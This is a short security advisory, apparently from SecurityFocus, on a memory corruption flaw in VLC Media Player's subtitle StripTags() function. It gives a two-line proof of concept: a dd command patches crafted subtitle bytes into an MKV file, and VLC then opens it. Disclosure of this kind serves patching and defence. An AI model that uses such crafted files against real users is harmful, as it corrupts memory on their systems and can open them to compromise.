VLC Media Player Subtitle 'StripTags()' Function Memory Corruption Vulnerability

An attacker can exploit this issue by enticing an unsuspecting user to open a malicious media file containing malicious subtitles with the vulnerable application.

The following proof-of-concept commands are available:

1. echo -ne '<foo\0crashme' | dd conv=notrunc bs=1 seek=877862 \ of=refined-australia-blu720p-sample.mkv

2. vlc --sub-language English refined-australia-blu720p-sample.mkv


 

Privacy Statement
Copyright 2010, SecurityFocus